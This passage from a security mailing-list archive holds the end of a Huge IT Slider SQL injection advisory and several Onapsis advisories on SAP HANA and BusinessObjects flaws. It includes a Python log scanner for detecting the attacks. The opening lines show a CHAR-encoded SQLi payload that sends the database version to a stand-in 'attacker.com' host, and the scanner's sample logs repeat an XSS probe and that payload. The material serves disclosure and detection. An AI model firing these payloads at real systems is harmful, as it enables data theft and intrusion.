 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114
 --
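The pfSense PoC URLs above (CVE-2015-2294) are percent-encoded and the Huge IT Slider payloads (CVE-2015-2062) sit in a single named parameter, so a defender matching on raw log lines misses both. The following added example (not code from either advisory or vendor) parses combined-format access-log lines, decodes every query parameter, and applies per-script, per-parameter rules taken from the two advisories; the log lines are constructed.

```python
"""Flag the request shapes from the pfSense and Huge IT Slider advisories in
web-server access logs.

Added example, not code from either advisory or vendor. Rules are keyed on the
script path and parameter names the advisories name, so an ordinary request to
the same script with a benign value does not fire.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx combined format: client ident user [time] "METHOD target PROTO" status size
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# pfSense scripts and GET parameters named in HTB23251 (CVE-2015-2294).
PFSENSE_XSS_PARAMS = {
    "/status_captiveportal.php": {"zone"},
    "/firewall_rules.php": {"if", "dragtable", "dragtable[]"},
    "/firewall_shaper.php": {"queue"},
    "/services_unbound_acls.php": {"id"},
    "/diag_logs_filter.php": {
        "filterlogentries_time", "filterlogentries_sourceipaddress",
        "filterlogentries_sourceport", "filterlogentries_destinationipaddress",
        "filterlogentries_interfaces", "filterlogentries_destinationport",
        "filterlogentries_protocolflags", "filterlogentries_qty",
    },
}
_SCRIPT_TAG = re.compile(r"<\s*script\b|javascript:", re.IGNORECASE)

# Huge IT Slider (CVE-2015-2062): removeslide on admin.php should be an id,
# never SQL. Markers are the functions the advisory's payloads rely on.
_SQLI_MARKERS = re.compile(
    r"\bselect\b|load_file\s*\(|\bconcat\s*\(|\bchar\s*\(", re.IGNORECASE
)


def decode_params(target):
    """Split a request target into (path, [(name, value)]) with decoded values.

    parse_qsl decodes once; a second unquote surfaces double-encoded payloads
    and leaves singly-encoded values unchanged.
    """
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    return parts.path, [(name, unquote(value)) for name, value in params]


def inspect_request(target):
    """Return a list of (rule, parameter) findings for one request target."""
    path, params = decode_params(target)
    findings = []
    for name, value in params:
        if name in PFSENSE_XSS_PARAMS.get(path, ()) and _SCRIPT_TAG.search(value):
            findings.append(("pfsense-reflected-xss", name))
        if path == "/wp-admin/admin.php" and name == "removeslide":
            if not value.isdigit() and _SQLI_MARKERS.search(value):
                findings.append(("hugeit-slider-sqli", name))
    return findings


def scan_log(lines):
    """Return [(client, target, findings)] for every line that triggers a rule."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append((m.group("client"), m.group("target"), findings))
    return hits


# Constructed log lines: one benign pfSense request, the captive-portal PoC
# shape, the Huge IT removeslide payload shape, and a benign removeslide.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Mar/2015:10:00:01 +0000] "GET /firewall_rules.php?if=wan HTTP/1.1" 200 5120',
    '203.0.113.5 - - [25/Mar/2015:10:00:02 +0000] "GET /status_captiveportal.php?zone=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E HTTP/1.1" 200 4096',
    '198.51.100.7 - - [12/Mar/2015:11:30:00 +0000] "GET /wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46)))) HTTP/1.1" 200 1024',
    '198.51.100.7 - - [12/Mar/2015:11:31:00 +0000] "GET /wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=7 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, target, findings in scan_log(SAMPLE_LOG):
        print(client, findings, target[:60])
```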

---

Solution:

Update to Huge IT Slider 2.7.0

More Information:
https://wordpress.org/support/topic/huge-it-slider-security-vulnerability-notification-sql-injection

---

References:

[1] High-Tech Bridge Advisory HTB23250 - 
https://www.htbridge.com/advisory/HTB23250 - SQL Injection in Huge IT Slider 
WordPress Plugin.
[2] Huge IT Slider WordPress Plugin - http://huge-it.com/ - Huge IT slider is a 
convenient tool for organizing the images represented on your website into 
sliders. Each product on the slider is assigned with a relevant slider, which 
makes it easier for the customers to search and identify the needed images 
within the slider.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide

[Onapsis Security Advisory 2015-001] Multiple Reflected Cross Site Scripting Vulnerabilities in SAP HANA Web-based Development Workbench

2015-02-26 Thread Onapsis Research Labs


Onapsis Security Advisory ONAPSIS-2015-001: Multiple Reflected Cross Site
Scripting Vulnerabilities in SAP HANA Web-based Development Workbench


1. Impact on Business
=

By exploiting this vulnerability a remote unauthenticated attacker would be
able to attack other users of the system.

Risk Level: Medium


2. Advisory Information
=
- Public Release Date: 2015-02-25

- Subscriber Notification Date: 2015-02-25

- Last Revised: 2015-02-25

- Security Advisory ID: ONAPSIS-2015-001

- Onapsis SVS ID: ONAPSIS-00137 and ONAPSIS-00138

- CVE: CVE-2015-2072

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N)


3. Vulnerability Information


- Vendor: SAP

- Affected Components:
  - HANA - Release 73 (1.00.73.00.389160)
  - HANA Developer Edition - Release 80 (1.00.80.00.391861)
  (Check SAP Note 2069676 for detailed information on affected releases)

- Vulnerability Class: CWE-79: Improper Neutralization of Input During
Web Page Generation (Reflected Cross-Site Scripting)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: No

- Original Advisory:
http://www.onapsis.com/research/security-advisories/multiple-reflected-cross-site-scripting-vulnerabilities-in-sap-hana-webbased-development-workbench


4. Affected Components Description
==

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.


5. Vulnerability Details


SAP HANA contains a reflected Cross Site Scripting (XSS) vulnerability on
the pages
/sap/hana/ide/core/plugins/editor/templates/trace/hanaTraceDetailService.xsjs
and /sap/hana/xs/ide/editor/templates/trace/hanaTraceDetailService.xsjs.

A reflected cross-site scripting attack can be used to non-permanently
deface or modify displayed content from a Web site. Reflected cross-site
scripting can be used to steal another user's authentication
information, such as data relating to their current session. An attacker
who gains access to this data may use it to impersonate the user and
access all information with the same rights as the target user. If an
administrator is impersonated, the security of the application may be
fully compromised.


6. Solution
===

SAP has released SAP Note 2069676, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2069676

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==

2014-02-25: Onapsis provides vulnerability information to SAP AG.
2014-02-26: SAP confirms receipt of the vulnerability information.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.

[Onapsis Security Advisory 2015-004] SAP Business Objects Unauthorized Audit Information Delete via CORBA

2015-02-26 Thread Onapsis Research Labs


Onapsis Security Advisory ONAPSIS-2015-004: SAP Business Objects
Unauthorized Audit Information Delete via CORBA


1. Impact on Business
=

By exploiting this vulnerability a remote unauthenticated attacker would be
able to delete auditing information of the remote system.

This way, the attacker could perform malicious activities without being
detected.

Risk Level: High


2. Advisory Information
===

- Public Release Date: 2015-02-25

- Subscriber Notification Date: 2015-02-25

- Last Revised: 2015-02-25

- Security Advisory ID: ONAPSIS-2015-004

- Onapsis SVS ID: ONAPSIS-00112

- CVE: CVE-2015-2075

- Researcher: Will Vandevanter

- Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P)


3. Vulnerability Information


- Vendor: SAP

- Affected Components:
  - BusinessObjects Edge 4.0
  (Check SAP Note 2011396 for detailed information on affected releases)

- Vulnerability Class: Improper Authorization (CWE-285)

- Remotely Exploitable: Yes

- Locally Exploitable: No

- Authentication Required: No

- Original Advisory:
http://www.onapsis.com/esearch/security-advisories/sap-business-objects-unauthorized-audit-information-delete-via-corba


4. Affected Components Description
==

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details


It is possible for an unauthenticated user to remove audit events from a
remote BusinessObjects service using CORBA. Specifically, the attacker
can tell the remote service (i.e. the auditee) to clear an event from
its queue. After the event is removed from the auditee queue, the
auditor will never have knowledge of the event and, hence, it will not
be written to the Audit database. An attacker can use this to hide their
actions. By default, the auditor polls all auditees every 5 minutes to
ask for events in their queue.

Note, this vulnerability does not allow an attacker to remove events
already written to the database. It only allows events waiting in the
auditee queue to be removed. The clearData CORBA operation is used to
remove the event; authentication is not required.


6. Solution
===

SAP has released SAP Note 2011396, which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2011396

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms receipt of the vulnerability information.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize their resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: Onapsis Research Team

iEYEARECAAYFAlTt3yEACgkQz3i6WNVBcDVbuACfXRTcTc+4MiUKl60VHRJaN1UR

[Onapsis Security Advisory 2015-005] SAP Business Objects Unauthorized Audit Information Access via CORBA

2015-02-26 Thread Onapsis Research Labs

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory ONAPSIS-2015-005: SAP Business Objects
Unauthorized Audit Information Access via CORBA


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker would
be able to read auditing information, thereby accessing sensitive
business data. Access to this functionality should be restricted.

Risk Level: Medium


2. Advisory Information
===

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-005

- - Onapsis SVS ID: ONAPSIS-00110

- - CVE: CVE-2015-2076

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information


- - Vendor: SAP

- - Affected Components:
  - BusinessObjects Edge 4.0
  (Check SAP Note 2011395 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-audit-information-access-via-corba


4. Affected Components Description
==

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details


It is possible for an unauthenticated user to retrieve any audit events
from a remote BusinessObjects service. This can disclose sensitive
information including report names, universe queries, logins, etc.
Auditing details are listed in the Auditing tab of the CMS. All services
which expose an Auditing service are vulnerable. In the default
configuration this includes all BusinessObjects services except the CMS.


6. Solution
===

SAP has released SAP Note 2011395 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2011395

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==

2014-02-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms receipt of the vulnerability information.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: Onapsis Research Team

iEYEARECAAYFAlTt3yoACgkQz3i6WNVBcDX5EQCfZG26JL1yFGvDoDGEJ+pthDeI
TV8AoOEUz36esHb0Ax456UC4JmgFND3O
=kgpo
-END PGP SIGNATURE-



[Onapsis Security Advisory 2015-002] SAP Business Objects Unauthorized File Repository Server Read via CORBA

2015-02-26 Thread Onapsis Research Labs

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory ONAPSIS-2015-002: SAP Business Objects
Unauthorized File Repository Server Read via CORBA


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker would
be able to retrieve sensitive business data stored on the remote system.

Risk Level: High


2. Advisory Information
===

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-002

- - Onapsis SVS ID: ONAPSIS-00111

- - CVE: CVE-2015-2073

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information


- - Vendor: SAP

- - Affected Components:
  - BusinessObjects Edge 4.0
  (Check SAP Note 2018682 for detailed information on affected releases)

- - Vulnerability Class: External Control of File Name or Path (CWE-73)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-read-via-corba

4. Affected Components Description
==

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details


The BusinessObjects File Repository Server (FRS) CORBA listener allows a
user to read any file stored in the FRS without authentication. The only
requirement is that the user knows the name of the file in the FRS, for
example "frs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rpt". With
knowledge of this filename, the user can read the file remotely without
authentication.

Note that using CORBA it is also possible to test whether a directory or
file exists on the file system. Therefore, although unlikely, an attacker
could guess directories and then filenames to brute-force file locations.
This would be considerably easier with a predictable file naming
convention.


6. Solution
===

SAP has released SAP Note 2018682 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2018682

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.



7. Report Timeline
==

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms receipt of the vulnerability information.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: Onapsis Research Team

iEYEARECAAYFAlTt3vsACgkQz3i6WNVBcDViHgCguruVbAL1FxUjQlthB5sMx0J6
zqwAnR7jg3BGxzAyhU3ClMSxJEfLQPgx
=NrTV
-END PGP SIGNATURE-



[Onapsis Security Advisory 2015-003] SAP Business Objects Unauthorized File Repository Server Write via CORBA

2015-02-26 Thread Onapsis Research Labs

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory ONAPSIS-2015-003: SAP Business Objects
Unauthorized File Repository Server Write via CORBA


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker would
be able to overwrite sensitive business data stored on the remote system.

Risk Level: High


2. Advisory Information
===

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-003

- - Onapsis SVS ID: ONAPSIS-00109

- - CVE: CVE-2015-2074

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P)


3. Vulnerability Information


- - Vendor: SAP

- - Affected Components:
  - BusinessObjects Edge 4.0
  (Check SAP Note 2018681 for detailed information on affected releases)

- - Vulnerability Class: External Control of File Name or Path (CWE-73)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-write-via-corba


4. Affected Components Description
==

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details


The BusinessObjects File Repository Server (FRS) CORBA listener allows
the writing of any file stored in the FRS without authentication. If the
attacker wishes to overwrite a file, the only requirement is that the
user knows the name of the file in the FRS, for example
"frs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rpt". With
knowledge of this filename, the user can write the file remotely without
authentication.

Note that using CORBA it is also possible to test whether a directory or
file exists on the file system. Therefore, although unlikely, an attacker
could guess directories and then filenames, brute-forcing files to
overwrite. This would be considerably easier with a predictable file
naming convention.


6. Solution
===

SAP has released SAP Note 2018681 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2018681

Onapsis strongly recommends that SAP customers download the related
security fixes and apply them to the affected components in order to
reduce business risk.


7. Report Timeline
==

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms receipt of the vulnerability information.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: Onapsis Research Team

iEYEARECAAYFAlTt3w8ACgkQz3i6WNVBcDWRkACffvfY2LtFi4zyVwTpYD1dIABD
X8IAoK2UVIGnUiTYzEtfm0F6dAE9xoFR
=OK8R
-END PGP SIGNATURE-


